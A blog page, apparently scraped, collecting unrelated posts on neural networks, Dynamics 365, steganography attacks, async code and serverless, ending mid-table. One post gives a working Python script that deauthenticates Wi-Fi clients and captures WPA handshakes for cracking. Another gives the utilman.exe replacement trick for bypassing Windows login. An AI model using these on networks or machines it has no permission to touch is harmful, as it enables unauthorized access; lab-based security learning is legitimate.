" MicromOne

Pagine

Perceptron, Multilayer Perceptron (MLP) and Neural Network

 1. Perceptron

  • What it is: The simplest form of a neural network, introduced by Frank Rosenblatt in 1958.

  • Structure: Just one neuron (sometimes extended to a single layer of neurons).

  • How it works:

    • Takes several inputs, applies weights, sums them up, and passes the result through an activation function (often a step function in the classic version).

    • Used as a linear classifier (separates data into two classes with a straight line/hyperplane).

  • Limitation: Can only solve problems that are linearly separable (e.g., it cannot solve XOR).
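As a quick illustration of that limitation, here is a minimal NumPy sketch (hand-picked weights, no training loop): a single step-activation perceptron can represent AND, but no choice of weights reproduces XOR.

import numpy as np

def perceptron(x, weights, bias):
    # Weighted sum of the inputs followed by a step activation
    return 1 if np.dot(x, weights) + bias > 0 else 0

# Weights that implement logical AND (linearly separable)
for x in [(0, 0), (0, 1), (1, 0), (1, 1)]:
    print(x, "->", perceptron(np.array(x), np.array([1.0, 1.0]), -1.5))
# Output: 0, 0, 0, 1. No single weight/bias choice yields XOR (0, 1, 1, 0),
# because XOR is not linearly separable.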


2. Multilayer Perceptron (MLP)

  • What it is: A feedforward neural network with one or more hidden layers of perceptrons.

  • Structure:

    • Input layer → Hidden layer(s) → Output layer.

    • Each perceptron (node) in a layer connects to all perceptrons in the next layer (dense/fully connected).

  • Key feature: Uses nonlinear activation functions (ReLU, sigmoid, tanh, etc.), which allow it to solve nonlinear problems like XOR.

  • Training: Typically trained using backpropagation + gradient descent.

  • Use cases: Classification, regression, pattern recognition, etc.
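For instance, a tiny scikit-learn MLP (a sketch assuming a single hidden layer of 8 tanh units) can learn XOR, which a single perceptron cannot:

from sklearn.neural_network import MLPClassifier

# XOR is not linearly separable, so a lone perceptron fails on it
X = [[0, 0], [0, 1], [1, 0], [1, 1]]
y = [0, 1, 1, 0]

clf = MLPClassifier(hidden_layer_sizes=(8,), activation="tanh",
                    solver="lbfgs", max_iter=2000, random_state=0)
clf.fit(X, y)
print(clf.predict(X))  # typically [0 1 1 0]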


3. Neural Network (General Term)

  • What it is: A broader concept — any computational model inspired by the brain’s structure, consisting of layers of interconnected nodes (“neurons”).

  • Includes:

    • Simple perceptrons

    • MLPs (feedforward networks)

    • Convolutional Neural Networks (CNNs)

    • Recurrent Neural Networks (RNNs)

    • Transformers, etc.

  • So an MLP is a type of neural network, and the perceptron is its simplest building block.


Hierarchy of concepts:

  • Perceptron → single linear classifier neuron.

  • Multilayer perceptron (MLP) → a specific type of feedforward neural network with multiple layers of perceptrons.

  • Neural network → the general umbrella term that includes perceptrons, MLPs, CNNs, RNNs, etc.

How to Access Microsoft Dynamics 365 CRM Data with SQL (and Why You Can’t Insert Directly)


Microsoft Dynamics 365 CRM is one of the most powerful business platforms available today. With the underlying Dataverse (formerly known as Common Data Service), it stores all business entities such as Accounts, Contacts, Opportunities, and custom tables in a secure, scalable cloud database.

One of the most frequently asked questions is:

“Can I connect to Dynamics 365 with Microsoft SQL Server (MSSQL) and run queries like a normal database?”

The answer is both yes and no—let’s explore why.

Accessing Dataverse Data with SQL

Microsoft introduced the TDS (Tabular Data Stream) endpoint, which allows you to connect to Dataverse with familiar SQL tooling such as SQL Server Management Studio (SSMS) or Power BI (community tools like SQL 4 CDS build on the same capability).

How to Connect

  1. Open SSMS.

  2. Connect to:

    <yourenvironment>.crm.dynamics.com,5558

    (Port 5558 is required for TDS endpoint connections.)

  3. Choose Azure Active Directory - Universal with MFA (or Azure Active Directory - Password) authentication.

  4. Enter your Dynamics 365 credentials.

Once connected, you’ll see tables such as dbo.account, dbo.contact, and others—representing entities in Dataverse.

Example Query

SELECT TOP 10 name, accountnumber, revenue FROM dbo.account ORDER BY revenue DESC;

This feels exactly like querying a SQL Server database—but there’s an important limitation.

The Limitation: Read-Only Access

The TDS endpoint is read-only.
That means you cannot perform:

  • INSERT

  • UPDATE

  • DELETE

This restriction is by design. Microsoft enforces business logic, workflows, and security layers through the Dataverse platform. Direct SQL writes would bypass these safeguards, potentially breaking automations, security roles, or integrations.

Alternatives for Writing Data (Insert/Update/Delete)

While SQL write operations are not available, you still have several powerful options:

1. Dataverse Web API (OData/REST)

The official API allows full CRUD (Create, Read, Update, Delete) operations.
Example to create a contact:

POST https://<yourenvironment>.crm.dynamics.com/api/data/v9.3/contacts
Authorization: Bearer <token>
Content-Type: application/json

{
  "firstname": "John",
  "lastname": "Smith",
  "emailaddress1": "john.smith@example.com"
}

2. SDK / Client Libraries

Using the official SDK (C#, Python, JavaScript), you can programmatically insert or update records while respecting Dataverse logic.
Example in C#:

var contact = new Entity("contact");
contact["firstname"] = "John";
contact["lastname"] = "Smith";
service.Create(contact);

3. Power Automate

Microsoft’s Power Automate (formerly Flow) provides a low-code way to insert, update, or delete records in Dataverse without writing SQL.

4. Data Import & Dataflows

For bulk operations, you can import Excel/CSV files or use Power Query Dataflows to push data into Dataverse tables.

The TDS endpoint provides a familiar way to query Dynamics 365 CRM data, but for full database operations such as insert or update you’ll need the Web API, the SDK, or integration tools like Power Automate.


Using addOnChange in Dynamics 365 JavaScript: A Practical Example

If you're working with Microsoft Dynamics 365 and customizing forms using JavaScript, you’ve likely encountered the addOnChange method. This is a key method that allows you to trigger specific logic whenever a form field changes.

Let’s examine this common line of code:

formContext.getAttribute("your_field_name").addOnChange(Namespace.Module.OnChangeFunction.bind(Namespace.Module));

What Does This Code Do?

This line registers an event handler for the OnChange event of the your_field_name field on the form. In simple terms, it means:

"When the value of the specified field changes, execute the OnChangeFunction inside Namespace.Module."

Let's Break It Down:

  • formContext.getAttribute("your_field_name")
    This retrieves the field (attribute) from the current form. Replace "your_field_name" with the logical name of your field (e.g., "new_type").

  • .addOnChange(...)
    This method attaches a function to be called when the field value changes.

  • Namespace.Module.OnChangeFunction.bind(Namespace.Module)
    This is a reference to the function that should be executed. Passing the module to .bind() fixes the this context inside the function, which is especially useful when the function is part of a larger object or module.

Why Use .bind()?

If your event handler refers to this (for example, to access other methods or properties in your module), you need to bind it to that object, e.g. .bind(Namespace.Module), to maintain the correct context. Calling .bind() with no argument does not preserve the module as this, so the function might not behave as expected when triggered by Dynamics.

Example Scenario

Imagine you have a field called "Type" on your form — it could have values like “Customer,” “Supplier,” or “Internal.” When a user changes this field, you might want to:

  • Show or hide other fields,

  • Lock or unlock sections,

  • Trigger a warning or info message.

You can write that logic in a function (e.g., OnChangeFunction) and attach it using addOnChange.

Using addOnChange is a core part of client-side development in Dynamics 365. It enhances interactivity and allows you to create a more responsive user experience. Always remember to bind your functions properly when they're part of a structured object or module.

Steganography in Cyber Attacks: How Images Hide Malicious Payloads

In the world of cybersecurity, threats are constantly evolving. One of the more sophisticated methods attackers use today is steganography - the art of hiding information inside something that appears harmless. While steganography has legitimate uses, cybercriminals have weaponized it to bypass detection systems and deliver malware.

What is Steganography?

Steganography is the practice of concealing messages or data within another file, such as an image, video, or audio file. Unlike encryption, which scrambles data but still appears suspicious, steganography hides the fact that any hidden data exists at all.

Example:
You could hide the message "Hello World" in an image. The image looks normal in any viewer, but specialized software can read the hidden text.

How Cybercriminals Use It

A common technique seen in recent attacks involves two main components:

  1. A seemingly harmless image (JPG, PNG, etc.).

  2. A loader - usually a macro inside a Microsoft Office document or a small script.

Here's the typical process:

Step 1 - Initial Delivery

The victim receives a phishing email containing an Office document (.docm, .xlsm, etc.) or a download link.

Example:
An attacker sends a Word file titled Invoice.docm. The file looks legitimate but contains a macro.

Step 2 - Macro Execution

When the victim opens the file and enables macros, the hidden code inside the document runs.

Example:

  • Macro opens a seemingly normal image called photo.jpg.

  • Macro reads extra, hidden data at the end of the file.

The image itself is safe to view, but it carries hidden instructions.

Step 3 - Payload Extraction

The macro or script decodes the hidden payload. This could be encoded in Base64 or encrypted.

Safe Example:

  • Hidden text inside the image: SGVsbG8gV29ybGQ=

  • Macro decodes it: Hello World

In a real attack, this payload could be a command to download or run software.
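A harmless sketch of this extraction step, assuming a hypothetical photo.jpg with Base64 text appended after the image data:

import base64

# Any bytes after the JPEG end-of-image marker (FF D9) are ignored by image viewers,
# which is why appended data does not change how the picture looks.
with open("photo.jpg", "rb") as f:
    data = f.read()

eoi = data.rfind(b"\xff\xd9")
hidden = data[eoi + 2:].strip() if eoi != -1 else b""

if hidden:
    print(base64.b64decode(hidden).decode())  # e.g. "Hello World"
else:
    print("No appended data found.")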

Step 4 - Payload Execution

The extracted payload is executed, performing actions like:

  • Connecting to a remote server (backdoor).

  • Downloading additional software.

  • Stealing or encrypting files.

Safe Analogy Example:
Imagine the image has instructions to open a local PDF or display a message. The principle is the same - the image carries hidden instructions.

Why Attackers Do This

Using an image as a carrier provides several benefits for attackers:

  • Evasion - Images are less likely to be flagged by email filters or antivirus.

  • Obfuscation - Actual commands are hidden until extracted.

  • Modularity - The hidden payload can be updated without changing the email or document.

Real-World Example

In 2024, cybersecurity researchers observed campaigns where threat actors embedded PowerShell commands inside JPG files. The commands executed only after extraction, making detection extremely difficult.

Safe Demonstration:

  • Image: landscape.jpg

  • Hidden text (Base64): U2FmZSBwYXlsb2FkIQ==

  • Decoded: Safe payload!

No malware involved, but it demonstrates how attackers hide code.

How to Protect Yourself

  • Never enable macros in Office documents from unknown sources.

  • Use email security solutions that can scan inside archives and images.

  • Keep operating systems and applications updated.

  • Educate users about phishing and social engineering tactics.

Steganography in cyber attacks shows how creativity can be applied for malicious purposes. By hiding payloads in images, attackers can bypass many traditional defenses. Understanding these tactics through safe examples is the first step toward defending against them.

Building a Simple WPA Handshake Capture Tool in Python (Like Wifite)


If you've ever explored penetration testing on wireless networks, you've probably heard of Wifite - an automated tool for auditing Wi-Fi security. It's powerful, but also a bit complex under the hood.

In this post, we'll build a lightweight Python script that mimics one of Wifite's core features: scanning nearby networks and capturing WPA handshakes.

Disclaimer: This tutorial is for educational purposes only. Performing attacks on networks without permission is illegal. Always test in a controlled lab environment.

What Is a WPA Handshake?

A WPA handshake is the initial exchange between a Wi-Fi client (like your laptop) and an access point (router) when connecting. This handshake contains cryptographic material that, if captured, can be brute-forced offline to test password strength.

Capturing it doesn't require you to crack the password on the spot - it just saves the handshake packet to a .cap file for later analysis.

How the Script Works

Our script automates these steps:

  1. Enable monitor mode
    We switch the wireless card into monitor mode using airmon-ng, so it can capture all wireless traffic.

  2. Scan for nearby networks
    Using airodump-ng to detect BSSIDs, ESSIDs, channels, and signal strengths.

  3. Target a specific network
    The user chooses a network from the list.

  4. Capture handshake packets
    We start airodump-ng on the target channel and send deauth frames with aireplay-ng to force clients to reconnect - generating a handshake.

  5. Save the handshake file
    The captured packets are stored in .cap format for later cracking.

The Python Code

Here's the complete script:

#!/usr/bin/env python3
import subprocess
import re
import os
import time

def run_cmd(cmd):
    try:
        return subprocess.check_output(cmd, stderr=subprocess.DEVNULL, universal_newlines=True)
    except subprocess.CalledProcessError:
        return ""

def enable_monitor_mode(interface):
    print(f"[+] Enabling monitor mode on {interface}...")
    run_cmd(["sudo", "airmon-ng", "start", interface])
    return interface + "mon"

def scan_networks(interface):
    print(f"[+] Scanning networks on {interface}...")
    # airodump-ng runs until it is killed, so start it in the background instead of blocking
    subprocess.Popen(["sudo", "airodump-ng", "--output-format", "csv", "--write", "/tmp/scan", interface],
                     stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    time.sleep(5)
    subprocess.run(["pkill", "-f", "airodump-ng"])

    networks = []
    try:
        with open("/tmp/scan-01.csv", "r", encoding="utf-8", errors="ignore") as f:
            lines = f.readlines()
        for line in lines:
            if re.match(r"([0-9A-F]{2}:){5}[0-9A-F]{2}", line):
                parts = [x.strip() for x in line.split(",")]
                bssid = parts[0]
                channel = parts[3]
                pwr = parts[8]
                # In airodump-ng CSV output the ESSID is the 14th field (index 13)
                essid = parts[13] if len(parts) > 13 and parts[13] else "HIDDEN"
                networks.append({"BSSID": bssid, "ESSID": essid, "Channel": channel, "PWR": pwr})
    except FileNotFoundError:
        print("[-] Scan file not found.")
    return networks

def capture_handshake(interface, bssid, channel, essid):
    print(f"[+] Capturing handshake for {essid} ({bssid})...")
    dump_file = f"/tmp/{essid}_handshake"
    subprocess.Popen(["sudo", "airodump-ng", "-c", channel, "--bssid", bssid, "-w", dump_file, interface])
    time.sleep(3)
    print("[+] Sending deauth packets to force handshake...")
    subprocess.Popen(["sudo", "aireplay-ng", "--deauth", "10", "-a", bssid, interface])
    time.sleep(10)
    subprocess.run(["pkill", "-f", "airodump-ng"])
    print(f"[+] Handshake saved to {dump_file}-01.cap")

def main():
    interface = input("Wi-Fi interface (e.g., wlan0): ").strip() or "wlan0"
    mon_iface = enable_monitor_mode(interface)
    nets = scan_networks(mon_iface)

    if not nets:
        print("[-] No networks found.")
        return

    print("\nAvailable networks:")
    for i, net in enumerate(nets, 1):
        print(f"{i}. {net['ESSID']} ({net['BSSID']}) CH:{net['Channel']} PWR:{net['PWR']}")

    choice = int(input("\nSelect target network: ")) - 1
    if choice < 0 or choice >= len(nets):
        print("[-] Invalid choice.")
        return

    target = nets[choice]
    capture_handshake(mon_iface, target["BSSID"], target["Channel"], target["ESSID"])

if __name__ == "__main__":
    main()

How to Run It

  1. Install dependencies
    Make sure you have aircrack-ng suite installed:

    sudo apt update
    sudo apt install aircrack-ng
    
  2. Give execution permission

    chmod +x wpa_handshake.py
    
  3. Run the script as root

    sudo ./wpa_handshake.py
    
  4. Select a network and let it capture the handshake.

Possible Extensions

  • Add WPA cracking directly using aircrack-ng with a wordlist (see the sketch after this list).

  • Save logs with timestamps for better tracking.

  • Implement command-line arguments with argparse for automation.

  • Add WPS attack capabilities with reaver or bully.
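For the first extension, a minimal sketch of the cracking step (assuming the aircrack-ng binary is installed; the capture path, BSSID, and wordlist below are placeholders):

import subprocess

def crack_handshake(cap_file, bssid, wordlist="/usr/share/wordlists/rockyou.txt"):
    # Run aircrack-ng against the captured handshake using a wordlist
    subprocess.run(["aircrack-ng", "-w", wordlist, "-b", bssid, cap_file])

# Example usage (placeholders):
# crack_handshake("/tmp/MyNetwork_handshake-01.cap", "AA:BB:CC:DD:EE:FF")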


How to Reset a Windows Password

This article is for informational purposes only. Modifying system files can be risky and may cause data loss or system instability. Proceed with caution and at your own risk.

Sometimes you might forget your Windows login password and find yourself locked out of your PC. This guide explains a method to reset your password using the Windows Recovery Environment and Command Prompt.

Important Note: This method uses a system-level function to bypass password authentication. You must restore the original files once you've completed the process to maintain system security.

Access the Windows Recovery Environment

  1. On the login screen, hold down the Shift key and click Restart.

  2. Your PC will reboot into the Windows Recovery Environment.

  3. Navigate to Troubleshoot > Advanced options.

  4. Select Command Prompt.

Prepare Command Prompt for the Password Reset

When Command Prompt opens, you'll see a path similar to X:\Windows\System32\.

  1. Switch to your Windows drive:

    c:
    
  2. Navigate to the System32 folder:

    cd windows\system32
    
  3. Back up the utilman.exe file:

    ren utilman.exe utilman.exe.bak
    
  4. Copy cmd.exe and rename it as utilman.exe:

    copy cmd.exe utilman.exe
    
  5. Close Command Prompt and restart your computer.

Reset the Password

  1. On the login screen, click the Accessibility icon (bottom-right corner).

  2. Command Prompt will open.

  3. Enter the following command to reset the password:

    net user <username> *
    

    (Replace <username> with the account name).

  4. Enter the new password and confirm it.

    • To leave the password blank, press Enter twice.

  5. Close Command Prompt and log in with the new password.

To see all user accounts on the system, run:

net user

Restore the Original File

To keep your system secure, you must restore the original utilman.exe file.

  1. Reboot into the Windows Recovery Environment and open Command Prompt again.

  2. Navigate to System32:

    c:
    cd windows\system32
    
  3. Restore the file:

    ren utilman.exe.bak utilman.exe

Understanding the Audit Summary Tool in Microsoft Dynamics 365 CRM

When working with Microsoft Dynamics 365 CRM, one of the most essential features for administrators and power users is the Audit Summary View. This tool provides a clear and organized snapshot of user activities, system updates, and changes made to records across your CRM environment. Today, I’ll walk you through how this tool works and why it’s vital for compliance, troubleshooting, and governance.

What Is the Audit Summary Tool?

The Audit Summary Tool is part of the auditing feature within Dynamics 365 CRM. It allows system administrators to track changes at both the system and record level. The page at:

https://x-dev.crm4.dynamics.com/tools/audit/audit_summary.aspx

provides direct access to the summary interface, which consolidates audit data for easier analysis.

Key Features

  • User Activity Tracking
    View actions taken by users such as logins, record updates, deletions, and data exports.

  • Record-Level Audit History
    Drill down into specific entities and see what values were changed, by whom, and when.

  • System Changes Monitoring
    Capture backend changes like customizations, security role modifications, and configuration updates.

  • Filtering and Exporting
    Apply filters by user, date, or entity, and export the results for audit reporting.

Whether you’re managing a small team or a large enterprise instance of Dynamics 365, using the Audit Summary Tool gives you a powerful window into what’s happening under the hood. Bookmark your environment’s audit summary page and make it part of your regular system monitoring routine.


Neural Networks Made Simple: Understanding Cost Functions, Forward & Backward Pass

 Artificial Intelligence (AI) has come a long way, and at the heart of it lies the neural network - the core engine that powers everything from self-driving cars to personalized recommendations. But for many beginners, terms like forward pass, backward pass, and cost function can sound overwhelming.

In this post, we'll break down these concepts in a simple, logical way. Whether you're a student, a data science enthusiast, or a developer entering the AI space, this guide will help you build a solid foundation.

The Workflow of a Neural Network

Before diving into cost functions, let's understand how a neural network actually works - step by step.

Imagine you want a neural network to predict whether an email is spam or not.

Step 1: Forward Pass

This is the first phase where the input (email features) is passed through the network:

  • Each layer computes a weighted sum of its inputs.

  • It applies an activation function to introduce non-linearity.

  • The final output layer gives a prediction - say, a probability like 0.85 for spam.

The forward pass ends with a predicted output.

Step 2: Cost Function Calculation

Once we have a prediction, we need to measure how good or bad it is compared to the actual label (spam or not spam). That's where the cost function comes in - it tells us how wrong the prediction was.

A higher cost = more error.

Step 3: Backward Pass (Backpropagation)

The cost value is then propagated backward through the network:

  • Each neuron calculates its contribution to the total error using derivatives.

  • The gradients (rate of change) are computed for each weight.

  • Using these gradients, the network updates its weights using an optimizer (e.g., stochastic gradient descent).

This is the learning step. Over many iterations (epochs), the network gets better at minimizing the cost.
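To tie the three steps together, here is a minimal NumPy sketch of one training loop for a single sigmoid neuron with log loss (the numbers are purely illustrative):

import numpy as np

x = np.array([1.0, 2.0])           # input features
y = 1.0                            # true label (e.g., spam = 1)
w, b = np.array([0.1, -0.2]), 0.0  # initial weights and bias
lr = 0.5                           # learning rate

for epoch in range(100):
    # Forward pass: weighted sum -> sigmoid activation -> prediction
    z = np.dot(w, x) + b
    p = 1.0 / (1.0 + np.exp(-z))

    # Cost function: binary cross-entropy (log loss)
    loss = -(y * np.log(p) + (1 - y) * np.log(1 - p))

    # Backward pass: gradient of the loss with respect to z, then the weights
    dz = p - y
    w -= lr * dz * x               # gradient descent update
    b -= lr * dz

print(f"final prediction: {p:.3f}, loss: {loss:.4f}")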

What Is a Cost Function?

A cost function (also called a loss function) is a mathematical function used to measure the error between the predicted output and the actual target value.

In other words, it answers the question:

"How far off is the network's prediction from the truth?"

Purpose of the Cost Function:

  • Acts as a feedback signal

  • Guides weight updates during backpropagation

  • Helps the model learn from mistakes

A well-chosen cost function is critical - using the wrong one can lead to poor training results.

Common Cost Functions (with Examples)

Let's look at the most widely used cost functions based on the type of machine learning problem.

1. Binary Classification → Log Loss (Binary Cross-Entropy)

Used when the output is 0 or 1 (e.g., spam detection, tumor yes/no).

Formula:

\text{Loss} = -[y \cdot \log(p) + (1 - y) \cdot \log(1 - p)]

Where:

  • y: true label (0 or 1)

  • p: predicted probability

  • Penalizes confident wrong predictions heavily

  • Suitable for sigmoid outputs
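As a quick numerical illustration (a small sketch with made-up probabilities):

import numpy as np

def log_loss(y, p):
    # Binary cross-entropy for a single prediction
    return -(y * np.log(p) + (1 - y) * np.log(1 - p))

print(log_loss(1, 0.9))  # confident and correct -> about 0.105
print(log_loss(1, 0.1))  # confident but wrong   -> about 2.303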

2. Multi-Class Classification → Cross-Entropy Loss

Used when there are more than two classes (e.g., classifying digits 0-9).

Formula:

\text{Loss} = -\sum_{i=1}^{C} y_i \log(p_i)

Where:

  • y_i: actual label (one-hot encoded)

  • p_i: predicted probability for class i

  • C: total number of classes

  • Works with softmax activation in the final layer

  • Common in image and text classification

3. Regression → Mean Squared Error (MSE)

Used when the output is a continuous number (e.g., price prediction).

Formula:

\text{MSE} = \frac{1}{n} \sum_{i=1}^{n} (y_i - \hat{y}_i)^2

  • Penalizes larger errors more than smaller ones

  • Sensitive to outliers

4. Regression → Mean Absolute Error (MAE)

Alternative to MSE for regression.

Formula:

\text{MAE} = \frac{1}{n} \sum_{i=1}^{n} |y_i - \hat{y}_i|

  • More robust to outliers

  • Less smooth optimization surface than MSE
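A short sketch comparing the two regression losses on the same made-up predictions; the outlier in the last sample shows why MSE reacts more strongly:

import numpy as np

y_true = np.array([3.0, 5.0, 7.0, 9.0])
y_pred = np.array([2.5, 5.0, 7.5, 15.0])  # the last prediction is an outlier

mse = np.mean((y_true - y_pred) ** 2)   # about 9.1, dominated by the outlier
mae = np.mean(np.abs(y_true - y_pred))  # 1.75, less sensitive to it

print(f"MSE: {mse:.2f}  MAE: {mae:.2f}")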

Activation Functions (Bonus)

While not cost functions, activation functions play a crucial role during the forward pass. They introduce non-linearity, allowing the network to model complex patterns.

Popular ones include:

  • Sigmoid → for binary classification

  • ReLU → fast and effective for hidden layers

  • Softmax → for multi-class classification (used with cross-entropy)

Optimizers: From Error to Learning

After calculating the cost, we use an optimizer to update the weights. These include:

  • Stochastic Gradient Descent (SGD)

  • Adam Optimizer (adaptive learning rate)

  • RMSprop, Adagrad, etc.

The optimizer uses the gradient of the cost function to minimize the loss over time.

Summary Table

Task Type | Activation Output | Cost Function | Common Use Cases
Binary Classification | Sigmoid | Log Loss | Spam detection, medical diagnosis
Multi-Class Classification | Softmax | Cross-Entropy Loss | Handwriting recognition, NLP
Regression | Linear | MSE / MAE | Forecasting, stock prices

Debugging JavaScript in HTML

When you’re working on websites, it’s easy for bugs to creep in—especially when messing with the DOM or dealing with unpredictable values. Luckily, browsers like Chrome have us covered with DevTools, an incredibly handy set of tools for debugging.


In this post, I’ll walk you through how to debug JavaScript right inside an HTML page. Plus, I’ve got a simple, testable example to make things clearer.


Since JavaScript runs directly in the browser, even small mistakes can cause big issues with how your page looks or behaves. Bugs like typos, undefined variables, or DOM mishaps can all throw a wrench in the works. Debugging helps you:


- Find out exactly where your code is going wrong

- Understand how your functions are working under the hood

- Watch variables and values change in real time



<!DOCTYPE html>

<html>

<head>

  <title>JavaScript Debugging Example</title>

</head>

<body>

  <h2>Random ID Generator</h2>

  <button onclick="generateId()">Generate ID</button>

  <p id="output"></p>


  <script>

    function e(randomize) {

      var t = (Math.random()).toString(16) + "000000000";

      return randomize ? t.substr(2, 4) + "-" + t.substr(6, 4) : t.substr(2, 8);

    }


    function generateId() {

      // Hit the debugger to pause execution here

      debugger;

      let id = e() + "-" + e(true) + "-" + e(true) + "-" + e();

      document.getElementById("output").textContent = "Generated ID: " + id;

    }

  </script>

</body>

</html>


Or, an alternative version:


<!DOCTYPE html>

<html lang="en">

<head>

  <meta charset="UTF-8">

  <title>Debugging formRTMscript.js</title>

</head>

<body>

  <h2>Script Debug Example from formRTMscript.js</h2>

  <button onclick="runScript()">Run Script</button>

  <p id="output"></p>


  <script>

    // The same ID-generation logic as in the first example

    function e(t) {

      var r = (Math.random()).toString(16) + "000000000";

      return t ? "-" + r.substr(0, 4) + "-" + r.substr(4, 4) : r.substr(0, 8);

    }


    function runScript() {

      debugger; // Step into here using DevTools

      var id = e() + e(true) + e(true) + e();

      document.getElementById("output").textContent = "Generated: " + id;

    }


    //# sourceURL=formRTMscript.js

  </script>

</body>

</html>


U.S. State Department Policy Spotlight: 19 FAM & 20 FAM

 19 FAM – Cybersecurity Guidance

This volume details the Department of State’s cybersecurity policy framework.

  • Purpose & Scope: Established to align departmental systems and practices with federal cybersecurity mandates, 19 FAM sets forth required controls for information protection and risk mitigation.

  • Governance & Structure: It includes hierarchical governance elements, general operating guidelines, and component-specific procedures to ensure compliance across all systems.

  • Security Objectives: Emphasis is placed on regulatory compliance, including operational technology (OT) systems, outlining responsibilities for system owners and defining objectives such as confidentiality, integrity, and availability.

In short, 19 FAM is core to safeguarding sensitive State Department networks and data by embedding robust cybersecurity controls through governance, policy, and accountability.

20 FAM – Data and Artificial Intelligence

This volume marks a key advancement in the Department’s commitment to managing data and responsibly applying AI.

Key terms defined in 20 FAM include Enterprise Data Catalog, Master Reference Data, Data Steward, and foundational AI definitions as per federal legislation, anchoring the policy in legal and technical clarity.

Why This Matters (and Why It’s Relevant)

  • For Government & Tech Enthusiasts: These volumes reflect a shift in diplomacy toward data-driven decision-making and modern risk management.

  • Cybersecurity Professionals: 19 FAM details the Department’s regulatory expectations and system-owner responsibilities.

  • AI and Data Policy Scholars: 20 FAM provides a real-world example of federal AI governance, ethics, and data architecture planning.


When to Use Asynchronous vs Synchronous Functions (with Practical Examples and Analysis)

Choosing between asynchronous and synchronous functions can make a big difference in how your application performs and scales. In this guide, we'll explain the difference, show code examples in JavaScript and Python, and analyze real-life use cases where one approach is better than the other.

What's the Difference?

  • Synchronous functions block the execution of the program until they finish. Each line runs in order.

  • Asynchronous functions allow other code to run while waiting for something (like an API call, file read, or delay) to complete.

Synchronous Functions

Concept

Synchronous functions are simple and predictable. Great for fast tasks that don't involve waiting.

JavaScript Example

function calculateTotal(price, tax) {
  return price + (price * tax);
}

const total = calculateTotal(100, 0.2);
console.log("Total:", total);

Python Example

def calculate_total(price, tax):
    return price + (price * tax)

total = calculate_total(100, 0.2)
print("Total:", total)

Use Cases

  • Simple logic and transformations

  • Data parsing and formatting

  • Configuration setup before app starts

  • Command-line scripts or small utilities

Real-life Example: Data Cleaning

Imagine you're parsing CSV data from a file already loaded into memory. This is fast and doesn't require waiting.

def clean_data(data):
    return [row.strip().lower() for row in data if row]

cleaned = clean_data([" Alice ", "BOB", "", "carol"])
print(cleaned)  # ['alice', 'bob', 'carol']

Use synchronous here-no waiting, no blocking, just transformation.

Asynchronous Functions

Concept

Async functions are used when you're waiting for something: I/O, HTTP requests, file reads, etc. They allow other parts of the program to continue running.

JavaScript Example (Fetch from API)

async function fetchUserData(userId) {
  const response = await fetch(`https://api.example.com/users/${userId}`);
  const user = await response.json();
  console.log("User:", user);
}

fetchUserData(123);
console.log("Fetching in background...");

Python Example (Async with aiohttp)

import aiohttp
import asyncio

async def fetch_user_data(user_id):
    async with aiohttp.ClientSession() as session:
        async with session.get(f"https://api.example.com/users/{user_id}") as resp:
            user = await resp.json()
            print("User:", user)

asyncio.run(fetch_user_data(123))

Use Cases

  • Calling APIs

  • Reading/writing files

  • Waiting for databases

  • Concurrent tasks (e.g., downloading multiple files at once)

  • Keeping a UI or web server responsive

 Practical Analysis: Which One Should I Use?

Use Case | Async or Sync? | Why
Parse local JSON config | Sync | Fast, no waiting
Call REST API to get data | Async | Involves network delay
Process data in-memory | Sync | Immediate
Read a large file from disk | Async | Disk I/O can be slow
Display loading animation while fetching | Async | UI must stay responsive
Batch download 50 images | Async | Run in parallel for speed
Run data analysis on a CSV in-memory | Sync | Computation, no I/O

 Real-World Scenario: Data Dashboard App

Let's say you're building a dashboard that:

  1. Loads configuration from a local file  (Sync)

  2. Fetches live analytics from APIs  (Async)

  3. Aggregates and formats data (Sync)

  4. Saves results to cloud storage  (Async)

Here's a simplified Python version:

import asyncio
import aiohttp

# 1. Synchronous
def load_config():
    return {"api_url": "https://api.example.com"}

# 2. Asynchronous
async def fetch_data(api_url):
    async with aiohttp.ClientSession() as session:
        async with session.get(api_url) as resp:
            return await resp.json()

# 3. Synchronous
def summarize_data(data):
    return {
        "users": len(data),
        "avg_age": sum(d["age"] for d in data) / len(data)
    }

# 4. Asynchronous (simulated)
async def save_results(summary):
    await asyncio.sleep(1)
    print("Saved:", summary)

# Combine everything
async def main():
    config = load_config()
    data = await fetch_data(config["api_url"])
    summary = summarize_data(data)
    await save_results(summary)

asyncio.run(main())



Situation | Recommended approach
Simple logic (math, string ops) | Synchronous
Sequential steps that must block | Synchronous
Fetching data from a server | Asynchronous
Reading/writing large files | Asynchronous
Building web servers (Node.js, FastAPI) | Asynchronous
Scripts and small automation | Synchronous


Serverless and Beyond: Comparing AWS Lambda, Azure Functions, and Other Cloud Services

In the rapidly evolving world of cloud computing, serverless architecture has become a cornerstone for building modern, scalable applications. With tech giants like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP) leading the charge, developers have a wide range of tools to choose from-each with its strengths.

In this article, we'll explore and compare key services such as AWS Lambda, Azure Functions, and Google Cloud Functions, along with other critical cloud components including DevOps, AI/ML, and container orchestration.

What is Serverless Computing?

Serverless computing allows developers to run code without provisioning or managing servers. It's event-driven, scalable, and cost-efficient-perfect for microservices, APIs, automation, and more.
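For a sense of scale, the unit you deploy on these platforms is just a function. A minimal Python sketch of an AWS Lambda handler (the event shape depends on the trigger you configure, so the "name" field here is only an assumption):

import json

def lambda_handler(event, context):
    # 'event' carries the trigger payload (e.g., an API Gateway request);
    # 'context' provides runtime metadata. No server management is involved.
    name = event.get("name", "world")
    return {
        "statusCode": 200,
        "body": json.dumps({"message": f"Hello, {name}!"})
    }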

Key Serverless Platforms Compared

Feature | AWS Lambda | Azure Functions | Google Cloud Functions
Language Support | Python, Node.js, Java, Go, .NET, Ruby | C#, JavaScript, Python, Java | Python, Node.js, Go, Java
Triggers | API Gateway, S3, DynamoDB, SNS | Event Grid, HTTP, Timers, Queues | HTTP, Pub/Sub, Firebase, Cloud Storage
Scaling | Automatic | Automatic | Automatic
Max Duration | 15 minutes | Up to 60 minutes | 9 minutes (extendable)
Pricing Model | Pay per request + execution time | Same as AWS | Same as AWS

Containers and Orchestration

For more control and scalability, container-based solutions are preferred:

Platform | Service Name | Description
AWS | ECS, EKS, Fargate | Elastic container services and Kubernetes
Azure | AKS, Container Apps | Azure Kubernetes and lightweight serverless containers
GCP | GKE, Cloud Run | Kubernetes Engine and fully managed containers

DevOps and CI/CD Services

Cloud providers also offer complete toolsets for continuous integration and deployment:

Feature | AWS | Azure | GCP
